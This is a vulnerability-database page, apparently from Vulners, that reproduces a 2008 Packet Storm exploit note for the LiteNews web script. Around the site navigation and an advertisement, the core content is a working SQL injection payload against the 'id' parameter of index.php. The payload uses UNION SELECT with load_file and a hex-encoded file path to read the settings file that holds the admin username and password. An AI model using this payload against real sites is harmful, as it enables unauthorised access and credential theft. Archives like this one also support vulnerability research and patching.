Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

litenews-sql.txt

๐Ÿ—“๏ธย 06 Aug 2008ย 00:00:00Reported byย StackTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 17ย Views

lns-sql.txt Remote SQL injection in litenews-0

Show more
Code
`litenews-01 <= 1.2 Remote sql injection  
# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations  
# #  
#Injection Adress : http://Sitename/litenew//index.php?mode=view&id= code sql  
  
you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17  
  
C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870  
  
http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/*  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
remote sql injectionlitenewsdirectory settings.
17
.json
Report